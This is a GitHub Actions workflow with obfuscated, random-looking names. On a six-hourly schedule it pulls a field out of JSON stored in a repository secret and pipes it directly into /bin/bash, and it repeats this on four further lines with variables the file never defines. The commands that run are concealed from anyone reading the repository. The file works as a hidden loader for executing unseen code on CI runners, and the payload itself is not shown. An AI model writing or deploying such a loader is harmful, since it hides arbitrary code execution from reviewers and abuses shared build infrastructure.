name: wangmanying7654
on:
  workflow_dispatch:
  schedule:
    - cron: '54 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangmanying7654
        env:
          dbc4397: ${{ secrets.dbc4397 }}
        run: |
          echo $dbc4397 | jq -r .q6 | /bin/bash
          echo $cbf78 | jq -r .ffh5 | /bin/bash
          echo $ia1769 | jq -r .t55086 | /bin/bash
          echo $b5944 | jq -r .vm478 | /bin/bash
          echo $vexrd895 | jq -r .nf4 | /bin/bash

